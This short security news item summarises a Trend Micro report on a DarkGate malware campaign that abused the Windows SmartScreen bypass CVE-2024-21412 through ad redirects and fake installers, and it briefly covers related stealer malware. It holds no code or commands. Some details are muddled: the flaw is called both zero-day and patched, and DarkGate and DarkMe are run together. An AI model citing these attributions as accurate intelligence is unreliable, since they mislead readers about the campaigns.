A cybersecurity alert issued by Trend Micro highlights a concerning DarkGate malware campaign discovered in mid-January 2024. Using a zero-day flaw in Windows, a cyber campaign tricked users with fake software installers, exploiting a recently fixed vulnerability. PDFs with Google DDM redirects spread malware, directing victims to compromised sites exploiting Windows SmartScreen bypass CVE-2024-21412 for DarkMe installation.
“DarkGate Malware Exploits Patched Microsoft Vulnerability: Zero-Day Attack”
CVE-2024-21412 has a CVSS score of 8.1. It permits unauthenticated attackers to bypass SmartScreen protections via manipulated internet shortcut files. Microsoft fixed the vulnerability in February 2024. Despite this, threat actors, like Water Hydra, used it to spread DarkMe malware.
“Trend Micro’s recent findings show increased exploitation of a vulnerability. DarkGate campaign spreads malware through Google Ads redirects.” Phishing emails contain links. Clicking triggers redirects from Google’s doubleclick[.]net to compromised servers housing malicious .URL files exploiting CVE-2024-21412.
Counterfeit Microsoft software installers distribute DarkGate malware, masquerading as Apple iTunes, Notion, and NVIDIA applications, with a side-loaded DLL file.
“Another patched Windows SmartScreen bypass flaw (CVE-2023-36025, CVSS 8.8) exploited by threat actors to deliver DarkGate, Phemedrone Stealer, Mispadu.”
Using Google Ads tech, attackers extend their reach, intensify attacks with tailored ads, and magnify the threat landscape. Security researchers emphasize the importance of vigilance and caution, urging users to only trust software installers from official sources.
Reports by AhnLab and eSentire reveal fake Adobe Reader, Notion, Synaptics installers distributed via fake PDFs, leading to data theft.
“New malware, including Planet Stealer, Rage Stealer (xStealer), and Tweaks (Tweaker), are emerging, increasing cyber threats by stealing sensitive data.”
Threat actors use YouTube and Discord to distribute Roblox tweaks, using legitimate platforms to avoid web filter detection. Users inadvertently infect their systems by downloading malicious files disguised as Frames Per Second (FPS) optimization packages.
Malicious PowerShell tool, Tweaks, steals sensitive data: user info, location, Wi-Fi, passwords, Roblox IDs, game currency. It sends data to attackers through Discord webhook.
Malvertising and social engineering are key for spreading stealers and RATs like Agent Tesla, CyberGate RAT, and SapphireStealer.
The evolving threat landscape underscores the critical need for robust cybersecurity measures and user awareness to mitigate the risks posed by sophisticated malware campaigns and social engineering tactics.